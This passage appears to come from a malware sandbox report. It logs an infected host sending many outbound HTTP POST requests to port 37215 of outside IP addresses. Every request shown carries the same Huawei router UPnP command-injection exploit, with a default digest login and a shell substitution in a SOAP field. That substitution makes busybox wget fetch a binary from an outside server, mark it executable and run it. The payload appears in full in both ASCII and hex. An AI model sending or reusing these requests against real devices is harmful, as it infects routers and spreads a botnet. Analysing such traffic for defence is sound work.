                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2035192.168.2.153873441.193.87.5037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102662086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2036192.168.2.1556496190.15.115.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102662086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2037192.168.2.1556904102.14.56.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102662086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2038192.168.2.1536528186.216.57.15837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102695942 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2039192.168.2.1550964197.0.162.337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102897882 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2040192.168.2.1548008122.80.8.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102902889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2041192.168.2.153935641.41.135.11537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102904081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2042192.168.2.1536690222.170.6.3537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102937937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2043192.168.2.1538284181.203.150.23437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102987051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2044192.168.2.1557104186.220.115.23037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102989912 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2045192.168.2.1546332186.38.92.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103027105 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
